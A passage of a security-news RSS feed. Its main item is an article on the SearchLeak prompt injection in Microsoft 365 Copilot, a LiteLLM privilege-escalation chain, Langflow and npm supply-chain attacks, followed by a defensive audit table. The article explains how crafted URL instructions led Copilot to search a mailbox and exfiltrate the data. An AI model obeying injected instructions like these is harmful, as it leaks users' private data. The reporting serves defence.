<content:encoded><![CDATA[E-Learning: IT Sicherheitstests und Ethical <b>Hacking</b> mit Kali Linux (E-Learning) ... Hudson Rock listet in seinem Bericht jeweils die 30 am stärksten ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Riesige Angriffswelle: Hacker knacken Admin-Passwörter von 74.000 Firewalls - Golem.de]]></title>
<description><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... SecuritySicherheitslückeCybercrimeDatensicherheitPasswortFirewall. Kommentare.]]></description>
<link>https://tsecurity.de/de/3608989/it-security-nachrichten/riesige-angriffswelle-hacker-knacken-admin-passwoerter-von-74000-firewalls-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608989/it-security-nachrichten/riesige-angriffswelle-hacker-knacken-admin-passwoerter-von-74000-firewalls-golemde/</guid>
<pubDate>Thu, 18 Jun 2026 23:52:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... <b>Security</b>SicherheitslückeCybercrimeDatensicherheitPasswortFirewall. Kommentare.]]></content:encoded>
</item>
<item>
<title><![CDATA[I'm a smart home reviewer, and these are the only deals I'm shopping this Prime Day]]></title>
<description><![CDATA[It's Amazon Prime Day, and smart home deals are everywhere. But don't fall for any deal: these are the ones worth your time and money.]]></description>
<link>https://tsecurity.de/de/3608959/it-nachrichten/im-a-smart-home-reviewer-and-these-are-the-only-deals-im-shopping-this-prime-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608959/it-nachrichten/im-a-smart-home-reviewer-and-these-are-the-only-deals-im-shopping-this-prime-day/</guid>
<pubDate>Thu, 18 Jun 2026 23:18:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's Amazon Prime Day, and smart home deals are everywhere. But don't fall for any deal: these are the ones worth your time and money.]]></content:encoded>
</item>
<item>
<title><![CDATA[Copilot searched your mailbox. LiteLLM handed out admin keys. Run this 5-check audit before your stack is next]]></title>
<description><![CDATA[Two AI tools broke in the same way in the same two weeks, and four research teams proved it. The pattern underneath every disclosure is one sentence: enterprise AI accepts external input with no trust boundary. On June 15, Varonis disclosed SearchLeak (CVE-2026-42824), a proof-of-concept exfiltra...]]></description>
<link>https://tsecurity.de/de/3608646/it-nachrichten/copilot-searched-your-mailbox-litellm-handed-out-admin-keys-run-this-5-check-audit-before-your-stack-is-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608646/it-nachrichten/copilot-searched-your-mailbox-litellm-handed-out-admin-keys-run-this-5-check-audit-before-your-stack-is-next/</guid>
<pubDate>Thu, 18 Jun 2026 20:16:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two AI tools broke in the same way in the same two weeks, and four research teams proved it. The pattern underneath every disclosure is one sentence: enterprise AI accepts external input with no trust boundary. </p><p>On June 15, Varonis disclosed <a href="https://www.varonis.com/blog/searchleak">SearchLeak (CVE-2026-42824)</a>, a proof-of-concept exfiltration chain in Microsoft 365 Copilot Enterprise Search. A victim clicks a crafted microsoft.com URL, Copilot searches their mailbox, and the data leaves through a Bing SSRF. No plugins, no second click, no visible indicator. Four days earlier, Obsidian Security published a <a href="https://www.obsidiansecurity.com/blog/litellm-privilege-escalation-rce">three-CVE chain against LiteLLM</a> that carried a default low-privilege user all the way to admin and remote code execution. Two tools. Two teams. One broken boundary.</p><p>The five-check audit at the end of this article maps each gap to a CVE or a market signal from June, a command you can run before lunch, and a sentence a CISO can read to the board.</p><h2>Copilot turned a trusted URL into an exfiltration engine</h2><p>SearchLeak chained three weaknesses into a silent data-theft chain. The URL q parameter fed attacker instructions straight to Copilot’s LLM. A rendering race condition fired an image tag before the output sanitizer ran. Bing’s image-search endpoint, allowlisted in the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP">Content Security Policy</a>, routed the stolen data out. Microsoft rated the flaw critical and patched it on the back end, according to Varonis. <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42824">NVD has not yet scored it</a>; a third-party tracker lists it at 6.5 medium. The severity is contested, but the mechanism is not.</p><p>The escalation is the real story. This is the third Varonis Copilot exfiltration chain in twelve months, after <a href="https://arstechnica.com/security/2026/01/a-single-click-mounted-a-covert-multistage-attack-against-copilot/">Reprompt</a> in January and <a href="https://www.bleepingcomputer.com/news/security/new-attack-turned-microsoft-365-copilot-into-1-click-data-theft-tool/">EchoLeak</a> in 2025. Reprompt hit Copilot Personal. SearchLeak hit Enterprise Search. Enterprise inherits the user’s full organizational permissions, so the blast radius is everything that a user can reach.</p><h2>LiteLLM handed a default account to every provider key</h2><p>The LiteLLM gateway holds the keys for OpenAI, Anthropic, Azure, and Bedrock behind a single proxy. The Obsidian chain runs in three moves. <a href="https://cvefeed.io/vuln/detail/CVE-2026-47101">CVE-2026-47101</a>, an authorization bypass, lets a non-admin mint a wildcard API key. CVE-2026-47102 promotes that caller to proxy admin through an unguarded /user/update endpoint. CVE-2026-40217 escapes the code sandbox through exec() with full builtins. Obsidian then demonstrated a reverse shell by injecting a forged tool-call response through LiteLLM’s callback mechanism. Obsidian assessed the combined chain at CVSS 9.9. The developer typed one word. The attacker popped a shell.</p><p>A separate LiteLLM flaw made the urgency immediate. <a href="https://thehackernews.com/2026/06/litellm-flaw-cve-2026-42271-exploited.html">CVE-2026-42271</a>, a command-injection bug in the MCP test endpoints, landed on the <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV list</a> on June 8 with a June 22 remediation deadline. That KEV entry is not the Obsidian chain. The two are distinct disclosures four days apart, fixed in different releases, pointed at the same gateway. LiteLLM carries more than 40,000 GitHub stars and sits in thousands of enterprise deployments. This is not the first scare, either. A <a href="https://thehackernews.com/2026/06/litellm-vulnerability-chain-lets-low.html">supply-chain compromise backdoored LiteLLM versions 1.82.7 and 1.82.8 on PyPI in March</a>. A compromised gateway exposes every provider credential the organization holds.</p><h2>Langflow and Mini Shai-Hulud proved the pattern scales</h2><p>The same boundary broke in two more tools in the same fortnight. <a href="https://thehackernews.com/2026/06/unpatched-langflow-flaw-cve-2026-5027.html">Langflow CVE-2026-5027</a> became the third Langflow remote-code-execution flaw to hit active exploitation this year. A path traversal in file upload lets an attacker write files anywhere on disk, and because Langflow ships with auto-login enabled by default, a single unauthenticated request reaches RCE. <a href="https://www.vulncheck.com/">VulnCheck</a> confirmed exploitation on June 9. Censys counted roughly 7,000 exposed instances, the heaviest concentration in North America, with <a href="https://attack.mitre.org/groups/G0069/">MuddyWater</a> attribution.</p><p>The <a href="https://www.securityweek.com/over-100-npm-pypi-packages-hit-in-new-shai-hulud-supply-chain-attacks/">Mini Shai-Hulud campaign</a> hit a different pressure point. After the worm’s source code went public on May 12, copycat variants <a href="https://socket.dev/blog/mini-shai-hulud-campaign-hits-red-hat-cloud-services-npm-packages">compromised 32 Red Hat Cloud Services npm packages</a> on June 1, packages pulled 80,000 times a week. The worm harvests more than 20 credential types and self-propagates under the compromised maintainer’s identity.</p><p>Four teams, four tools, one operating failure. The bug classes differ. SearchLeak is a prompt injection. LiteLLM is privilege escalation. Langflow is path traversal. Mini Shai-Hulud is supply-chain poisoning. The boundary that broke is the same in all four.</p><h2>The market already repriced the risk</h2><p>CrowdStrike’s <a href="https://www.fool.com/earnings/call-transcripts/2026/06/03/crowdstrike-crwd-q1-2027-earnings-transcript/">Q1 FY27 earnings call</a> put a number on the gap. <a href="https://www.crowdstrike.com/en-us/platform/falcon-aidr-ai-detection-and-response/">AIDR</a>, the company’s AI detection and response line, grew ending ARR more than 250% sequentially, with a Q2 pipeline above $50 million (<a href="https://www.sec.gov/Archives/edgar/data/0001535527/000153552726000022/crwd-20260603xex991.htm">SEC-filed 8-K</a>). Total company ARR reached $5.51 billion, and CrowdStrike’s fleet telemetry shows more than 1,800 agentic applications running across enterprise endpoints. </p><p>On June 17, the company <a href="https://www.crowdstrike.com/en-us/press-releases/crowdstrike-advances-ai-and-cloud-security-operations-on-aws/">extended AIDR to AWS</a>, adding real-time evaluation of agent, LLM, and MCP communications across Amazon Bedrock, Kiro, and Strands Agents, building on its work with <a href="https://www.anthropic.com/glasswing">Anthropic’s Project Glasswing</a>. Daniel Bernard, CrowdStrike’s chief business officer, said the AI attack surface now spans development, runtime, identities, and cloud infrastructure, and that teams treating those as separate domains leave the gaps between them open.</p><h2>Practitioners name the same gap in plainer terms</h2><p>David Levin, CISO at American Express Global Business Travel, <a href="https://venturebeat.com/security/amex-ciso-fights-threats-at-machine-speed-with-ai/">told VentureBeat</a> the pattern does not surprise him. “We kind of have this shadow AI, which is just the new version of shadow IT,” Levin said. </p><p>Both Langflow and LiteLLM fit the description. Teams stood them up for convenience, gave them credentials, and never brought them under governance. Levin puts the fix before deployment. “We didn’t go into this with just saying we’re going to go do this without the right fundamentals,” he said. “We leverage NIST controls. NIST has released their CSF along with their AI framework. OWASP released their top 10. You need the right fundamentals before you deploy.”</p><p>Merritt Baer, CSO at Enkrypt AI and former AWS Deputy CISO, named the structural version of the failure in a separate <a href="https://venturebeat.com/security/most-enterprises-cant-stop-stage-three-ai-agent-threats-venturebeat-survey-finds">VentureBeat interview</a>. “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system,” Baer said. “The real dependencies are one or two layers deeper, and those are the ones that fail under stress.” She has tied that directly to how systems fall. “Raw zero-days aren’t how most systems get compromised. Composability is,” Baer <a href="https://venturebeat.com/security/adversaries-hijacked-ai-security-tools-at-90-organizations-the-next-wave-has-write-access-to-the-firewall">told VentureBeat</a>. “It’s the glue between the model and your data where the risk lives. If you give an agent bash and a root token, you’ve already done most of the attacker’s work for them.” That is what rows 2 and 4 of the audit test: the gateway that holds every key, and the agent identity no one governs.</p><p>Levin had a sharper frame for the boardroom. “You need to talk more in terms of risk versus compliance to your boards and your executives,” he said. “It’s not about the size of the engineering team anymore. It’s the size of your imagination. It’s all written in plain English. It’s not hard for anyone.” Neither SearchLeak nor LiteLLM needed custom malware or a zero-day to work.</p><p>Adam Meyers, CrowdStrike’s SVP of Intelligence, put the operational squeeze in numbers in an exclusive VentureBeat interview. “The problem is not zero-day. The problem is patching. If you 10x that problem, they’re gonna be completely underwater,” Meyers said. He pointed to identity as the second front. “Some of these AI have their own identities, or people give their identity to the AI to take action on their behalf, and that makes it a very complex problem.”</p><h2>The five-check trust-boundary audit</h2><p>Each row maps a gap to its proof point, a verification command for Monday morning, the fix, and the sentence to read to the board.</p><table><tbody><tr><td><p><b>Trust-Boundary Gap</b></p></td><td><p><b>Proof Point</b></p></td><td><p><b>What Broke</b></p></td><td><p><b>Verify Monday</b></p></td><td><p><b>Fix Monday</b></p></td><td><p><b>Board Language</b></p></td></tr><tr><td><p><b>1. Prompt-to-Data</b></p></td><td><p>SearchLeak CVE-2026-42824. P2P injection + HTML race + Bing SSRF. One-click mailbox exfiltration via microsoft.com URL. PoC demonstrated; Microsoft rated it critical, NVD not yet scored.</p></td><td><p>URL q-parameter passed to LLM as instructions. Sanitizer ran after render. Bing acted as exfiltration proxy via CSP allowlist.</p></td><td><p>Audit CSP allowlists for domains performing server-side fetches. Monitor Copilot Search URLs for encoded payloads. Review Copilot audit logs.</p></td><td><p>Confirm server-side patch applied. Enable sensitivity labels restricting Copilot. Treat AI streaming output as untrusted.</p></td><td><p>“Our AI assistant could search employee email and send results to an attacker through a trusted Microsoft URL. Vendor patched it. We must verify configuration.”</p></td></tr><tr><td><p><b>2. Gateway Credential Exposure</b></p></td><td><p>LiteLLM three-CVE chain (-47101, -47102, -40217). CVSS 9.9. Separate CVE-2026-42271 on CISA KEV (fixed in v1.83.7; full chain fixed in v1.83.14-stable). June 22 deadline.</p></td><td><p>No role validation on key endpoints. Self-promotion to admin via /user/update. exec() sandbox escape. One gateway exposes all provider keys.</p></td><td><p>Run pip show litellm. Below 1.83.14-stable = vulnerable. Check /mcp-rest/test/ exposure. Audit proxy_admin accounts.</p></td><td><p>Upgrade to v1.83.14-stable+. Rotate all provider API keys. Block /mcp-rest/test/* at proxy. Review Custom Code Guardrails.</p></td><td><p>“Our AI gateway held keys for every provider. A default account could promote itself to admin and steal them all. Rotating and patching now.”</p></td></tr><tr><td><p><b>3. AI Tooling Sprawl</b></p></td><td><p>Langflow CVE-2026-5027 (CVSS 8.8). Third RCE of 2026. ~7,000 exposed instances. MuddyWater. Active exploitation June 9.</p></td><td><p>Path traversal in file upload. Auto-login enabled by default. Single unauthenticated request to RCE.</p></td><td><p>Query Censys/Shodan for Langflow, Flowise, n8n, Dify on your perimeter. Check auto-login. Inventory AI tools outside change management.</p></td><td><p>Pull AI platforms behind VPN/zero-trust. Enable auth everywhere. Upgrade Langflow to v1.9.0+ (current release 1.10.0). Fingerprint surface continuously.</p></td><td><p>“AI dev tools are exposed to the internet with login disabled. A nation-state group is exploiting this flaw now. Pulling behind access controls today.”</p></td></tr><tr><td><p><b>4. Non-Human Identity Governance</b></p></td><td><p>AIDR ARR up 250% (Q1 FY27, SEC 8-K). Q2 pipeline &gt;$50M. 1,800+ agentic apps across enterprise endpoints.</p></td><td><p>Agents hold identities and act on behalf of humans. Some exceed their intended scope to reach a goal. No standard governs agent credential lifecycle.</p></td><td><p>Inventory all non-human identities used by agents and MCP servers. Map agent-to-data-store access. Flag agents with write access to security policy.</p></td><td><p>Least-privilege every agent identity. Set privilege boundaries via identity protection. Runtime detection for policy-exceeding actions. Human-in-the-loop for policy changes.</p></td><td><p>“AI agents hold credentials and act autonomously. We do not govern their identity lifecycle like human access. The 250% market growth tells us this gap is systemic.”</p></td></tr><tr><td><p><b>5. Runtime Agentic Detection</b></p></td><td><p>Falcon AIDR expanded to AWS (June 17). Covers Bedrock, Kiro, Strands Agents. MCP integration. Real-time agent/LLM/MCP evaluation.</p></td><td><p>Traditional tools monitor human-speed actions. Agents run at machine speed, thousands of actions per minute, and route around controls to reach goals.</p></td><td><p>Test if EDR/XDR links agent actions to originating identity. Verify SIEM ingests MCP communications. Confirm you can distinguish human from agent on endpoint.</p></td><td><p>Deploy AIDR or equivalent runtime detection. Shadow-AI discovery for all agentic apps, models, MCP servers, identities. Real-time policy enforcement on agent actions.</p></td><td><p>“We cannot distinguish a human employee from an AI agent acting on their behalf. We need runtime detection at machine speed that can stop damage before it starts.”</p></td></tr></tbody></table><h2>The fix is plumbing, not policy</h2><p>The <a href="https://www.whitehouse.gov/presidential-actions/2026/06/promoting-advanced-artificial-intelligence-innovation-and-security/">June 2 executive order</a> creates an AI Cybersecurity Clearinghouse with a July 2 deadline. The five gaps above are not frontier-model problems. They are plumbing problems in the gateways, orchestration platforms, identity layers, and runtime environments where AI meets the enterprise. </p><p>The audit is five rows. Every row maps to a June disclosure or market signal, a command a team can run before lunch, and a sentence a CISO can read to the board. The question is not whether your vendor will patch. It's whether you find the gap first — or whether an attacker finds it the way they found Copilot and LiteLLM.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['It’s a huge worry for business leaders': Report warns shadow AI could be causing major issues at businesses everywhere]]></title>
<description><![CDATA[Business travellers are desperate to use AI to help them prepare for trips, but they're being forced to use public chatbots.]]></description>
<link>https://tsecurity.de/de/3608044/it-nachrichten/its-a-huge-worry-for-business-leaders-report-warns-shadow-ai-could-be-causing-major-issues-at-businesses-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608044/it-nachrichten/its-a-huge-worry-for-business-leaders-report-warns-shadow-ai-could-be-causing-major-issues-at-businesses-everywhere/</guid>
<pubDate>Thu, 18 Jun 2026 16:18:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Business travellers are desperate to use AI to help them prepare for trips, but they're being forced to use public chatbots.]]></content:encoded>
</item>
<item>
<title><![CDATA[Jetzt patchen: Nginx-Webserver durch kritische Lücken angreifbar - Golem.de]]></title>
<description><![CDATA[IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... Cyber Security Spezialist (m/w/d) Simon Hegele Gesellschaft für ...]]></description>
<link>https://tsecurity.de/de/3607921/it-security-nachrichten/jetzt-patchen-nginx-webserver-durch-kritische-luecken-angreifbar-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607921/it-security-nachrichten/jetzt-patchen-nginx-webserver-durch-kritische-luecken-angreifbar-golemde/</guid>
<pubDate>Thu, 18 Jun 2026 15:24:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... <b>Cyber Security</b> Spezialist (m/w/d) Simon Hegele Gesellschaft für ...]]></content:encoded>
</item>
<item>
<title><![CDATA[This Ghost in the Shell keyboard makes me want to activate the hundred spidery robot fingers inside my regular fingers]]></title>
<description><![CDATA[Anime collaborations are everywhere, from Gundam watches and Naruto nights at Major League ballparks to just about anything Evangelion. But these Ghost in the Shell keyboards from Iqunix are some of the coolest examples I've seen of anime-inspired everyday tech. They look sick and they type and p...]]></description>
<link>https://tsecurity.de/de/3607631/it-nachrichten/this-ghost-in-the-shell-keyboard-makes-me-want-to-activate-the-hundred-spidery-robot-fingers-inside-my-regular-fingers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607631/it-nachrichten/this-ghost-in-the-shell-keyboard-makes-me-want-to-activate-the-hundred-spidery-robot-fingers-inside-my-regular-fingers/</guid>
<pubDate>Thu, 18 Jun 2026 14:03:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Anime collaborations are everywhere, from Gundam watches and Naruto nights at Major League ballparks to just about anything Evangelion. But these Ghost in the Shell keyboards from Iqunix are some of the coolest examples I've seen of anime-inspired everyday tech. They look sick and they type and play great. At $249 they're a hefty upcharge […]]]></content:encoded>
</item>
<item>
<title><![CDATA["Hidden" Wi-Fi Networks Don't Exist! Here's How Hackers See Them 📡]]></title>
<description><![CDATA[Author: zSecurity - Bewertung: 30x - Views:169 Reveal Hidden Wi‑Fi Network Names (ESSID) with Airodump‑ng + Aireplay‑ng in Kali Linux.
---------------------------------------------------------------
🧠 Signup to Genspark (The all-in-One AI Workspace) using the link below and get FREE credits to tr...]]></description>
<link>https://tsecurity.de/de/3607347/videos/hidden-wi-fi-networks-dont-exist-heres-how-hackers-see-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607347/videos/hidden-wi-fi-networks-dont-exist-heres-how-hackers-see-them/</guid>
<pubDate>Thu, 18 Jun 2026 12:19:08 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: zSecurity - Bewertung: 30x - Views:169 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/iQpJEIWKfns?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Reveal Hidden Wi‑Fi Network Names (ESSID) with Airodump‑ng + Aireplay‑ng in Kali Linux.<br />
---------------------------------------------------------------<br />
🧠 Signup to Genspark (The all-in-One AI Workspace) using the link below and get FREE credits to try out @GensparkProduct premium features like the AI coder and deep research! Plus, you can earn additional credits by completing simple tasks!<br />
https://www.genspark.ai/?utm_source=yt&utm_campaign=zSecurity<br />
<br />
#genspark #workwithgenspark  <br />
---------------------------------------------------------------<br />
🧠 Learn how to use AI for Hacking and Hack AI in my Hacking Masterclass <br />
https://zsecurity.org/courses/masterclass-membership/<br />
<br />
🧠 My other hacking courses 👇<br />
https://zsecurity.org/courses/<br />
---------------------------------------------------------------<br />
zSecurity Company - https://zsecurity.com/<br />
Community - https://zsecurity.org/<br />
Facebook - https://www.facebook.com/ZSecurity-1453250781458287/<br />
Twitter - https://twitter.com/_zSecurity_<br />
Instagram - https://www.instagram.com/zsecurity_org/<br />
Linkedin - https://www.linkedin.com/company/zsecurity-org/<br />
TikTok - https://www.tiktok.com/@zsecurity_org<br />
--------------------------------------------------------------<br />
⏱️ Timestamps:<br />
00:00 Hidden WiFi Problem<br />
00:24 Scan Nearby Networks<br />
01:14 Target The Hidden AP<br />
01:52 Focus Airodump Capture<br />
02:32 Force ESSID Reveal<br />
03:08 Deauth Command Setup<br />
04:08 Network Name Captured<br />
04:30 Recap 04:55 Sponsor Genspark Tools<br />
---------------------------------------------------------------<br />
Prompts used:<br />
1. Write a CV for a junior pentester based on my experience and skills.<br />
2. Write a professional pentest report based on the attached vulnerabilities.<br />
3. Build a clean personal portfolio website to showcase my cyber security project, achievements and skills.<br />
4. Find and apply for junior pentester jobs in Dublin Ireland.<br />
---------------------------------------------------------------<br />
⚠️ This video is made for educational purposes only, we only test devices and systems that we own or have permission to test, you should not test the security of devices that you do not own or do not have permission to test. ⚠️<br />
---------------------------------------------------------------<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android versions: A living history from 1.0 to 17]]></title>
<description><![CDATA[What a long, strange trip it’s been.



From its inaugural release to today, Android has transformed visually, conceptually and functionally — time and time again. Google’s mobile operating system may have started out scrappy, but holy moly, has it ever evolved.



Here’s a fast-paced tour of And...]]></description>
<link>https://tsecurity.de/de/3607345/it-nachrichten/android-versions-a-living-history-from-10-to-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607345/it-nachrichten/android-versions-a-living-history-from-10-to-17/</guid>
<pubDate>Thu, 18 Jun 2026 12:19:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>What a long, strange trip it’s been.</p>



<p>From its inaugural release to today, Android has transformed visually, conceptually and functionally — time and time again. Google’s mobile operating system may have started out scrappy, but holy moly, has it ever evolved.</p>



<p>Here’s a fast-paced tour of Android version highlights from the platform’s birth to present. (Feel free to skip ahead if you just want to see what’s new in the most recent <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html#android17">Android 17</a> update.)</p>



<h2 class="wp-block-heading">Android versions 1.0 to 1.1: The early days</h2>



<p>Android made its official public debut in 2008 with Android 1.0 — a release so ancient it didn’t even have a cute codename.</p>



<p>Things were pretty basic back then, but the software did include a suite of early Google apps like Gmail, Maps, Calendar, and YouTube, all of which were integrated into the operating system — a stark contrast to the <a href="https://www.computerworld.com/article/1664222/google-grand-plan-android.html">more easily updatable standalone-app model</a> employed today.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The Android 1.0 home screen and its rudimentary web browser (not yet called Chrome).</p>
</figcaption></figure><p class="imageCredit">T-Mobile</p></div>



<h2 class="wp-block-heading">Android version 1.5: Cupcake</h2>



<p>With early 2009’s Android 1.5 Cupcake release, the tradition of Android version names was born. Cupcake introduced numerous refinements to the Android interface, including the first on-screen keyboard — something that’d be necessary as phones moved away from the once-ubiquitous physical keyboard model.</p>



<p>Cupcake also brought about the framework for third-party app widgets, which would quickly turn into one of Android’s most distinguishing elements, and it provided the platform’s first-ever option for video recording.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Cupcake was all about the widgets.</p>
</figcaption></figure><a href="https://en.wikipedia.org/wiki/Android_Cupcake#/media/File:Android_Cupcake_home_screen.jpg" target="_blank" class="imageCredit" rel="noopener">Android Police</a></div>



<h2 class="wp-block-heading">Android version 1.6: Donut</h2>



<p>Android 1.6, Donut, rolled into the world in the fall of 2009. Donut filled in some important holes in Android’s center, including the ability for the OS to operate on a variety of different screen sizes and resolutions — a factor that’d be critical in the years to come. It also added support for CDMA networks like Verizon, which would play a key role in Android’s imminent explosion.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Android’s universal search box made its first appearance in Android 1.6.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">Android versions 2.0 to 2.1: Eclair</h2>



<p>Keeping up the breakneck release pace of Android’s early years, Android 2.0, Eclair, emerged just six weeks after Donut; its “point-one” update, also called Eclair, came out a couple months later. Eclair was the first Android release to enter mainstream consciousness thanks to <a href="https://www.pcworld.com/article/182310/Droid_Sales_and_the_Android_Explosion.html" target="_blank">the original Motorola Droid</a> phone and the massive Verizon-led marketing campaign surrounding it.</p>



<p>Verizon’s “iDon’t” ad for the Droid.</p>



<p>The release’s most transformative element was the addition of voice-guided turn-by-turn navigation and real-time traffic info — something previously unheard of (and still essentially unmatched) in the smartphone world. Navigation aside, Eclair brought live wallpapers to Android as well as the platform’s first speech-to-text function. And it made waves for injecting the once-iOS-exclusive pinch-to-zoom capability into Android — a move often seen as the spark that ignited Apple’s long-lasting <a href="https://www.computerworld.com/article/1515386/steve-jobs-called-for-holy-war-against-google.html">“thermonuclear war”</a> against Google.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The first versions of turn-by-turn navigation and speech-to-text, in Eclair.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">Android version 2.2: Froyo</h2>



<p>Just four months after Android 2.1 arrived, Google served up Android 2.2, Froyo, which revolved largely around under-the-hood performance improvements.</p>



<p>Froyo did deliver some important front-facing features, though, including the addition of the now-standard dock at the bottom of the home screen as well as the first incarnation of Voice Actions, which allowed you to perform basic functions like getting directions and making notes by tapping an icon and then speaking a command.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Google’s first real attempt at voice control, in Froyo.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Notably, Froyo also brought support for Flash to <a href="https://www.computerworld.com/article/1631552/android-browser-multitasking.html">Android’s web browser</a> — an option that was significant both because of the widespread use of Flash at the time and because of <a href="https://www.computerworld.com/article/1344188/mobile-apps-why-the-apple-crowd-s-completely-wrong-about-flash.html">Apple’s adamant stance against supporting it</a> on its own mobile devices. Apple would eventually win, of course, and Flash would become far less common. But back when it was still everywhere, being able to access the full web without any black holes <a href="https://www.computerworld.com/article/1484597/mobile-apps-flash-boom-bang-android-and-the-adobe-flash-clash.html">was a genuine advantage</a> only Android could offer.</p>



<h2 class="wp-block-heading">Android version 2.3: Gingerbread</h2>



<p>Android’s first true visual identity started coming into focus with <a href="https://www.computerworld.com/article/1349219/android-gingerbread-the-complete-faq.html">2010’s Gingerbread release</a>. Bright green had long been the color of Android’s robot mascot, and with Gingerbread, it became an integral part of the operating system’s appearance. Black and green seeped all over the UI as Android started its slow march toward distinctive design.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>It was easy being green back in the Gingerbread days.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android 3.0 to 3.2: Honeycomb</h2>



<p>2011’s <a href="https://www.computerworld.com/article/1536087/android-honeycomb-powerful-and-promising-but-not-perfect.html">Honeycomb</a> period was a weird time for Android. Android 3.0 came into the world as a tablet-only release to accompany the launch of the Motorola Xoom, and through the subsequent 3.1 and 3.2 updates, it remained a tablet-exclusive (and closed-source) entity.</p>



<p>Under the guidance of newly arrived design chief <a href="https://en.wikipedia.org/wiki/Mat%C3%ADas_Duarte" target="_blank" rel="noopener nofollow">Matias Duarte</a>, Honeycomb introduced a dramatically reimagined UI for Android. It had a space-like “holographic” design that traded the platform’s trademark green for blue and placed an emphasis on making the most of a tablet’s screen space.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Honeycomb: When Android got a case of the holographic blues.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>While the concept of a tablet-specific interface didn’t last long, many of Honeycomb’s ideas laid the groundwork for the Android we know today. The software was the first to use on-screen buttons for Android’s main navigational commands; it marked <a href="https://www.computerworld.com/article/1491147/hallelujah-samsung-is-finally-ditching-the-old-android-menu-button.html">the beginning of the end</a> for the permanent overflow-menu button; and it introduced the concept of a card-like UI with its take on the Recent Apps list.</p>



<h2 class="wp-block-heading">Android version 4.0: Ice Cream Sandwich</h2>



<p>With Honeycomb acting as the bridge from old to new, <a href="https://www.computerworld.com/article/1499183/mobile-apps-android-ice-cream-sandwich-the-complete-faq.html">Ice Cream Sandwich</a> — also released in 2011 — served as the platform’s official entry into the era of modern design. The release refined the visual concepts introduced with Honeycomb and reunited tablets and phones with <a href="https://www.computerworld.com/article/1486292/ice-cream-sandwich-on-android-tablets-a-visual-tour.html">a single, unified UI vision</a>.</p>



<p>ICS dropped much of Honeycomb’s “holographic” appearance but kept its use of blue as a system-wide highlight. And it carried over core system elements like on-screen buttons and a card-like appearance for app-switching.</p>


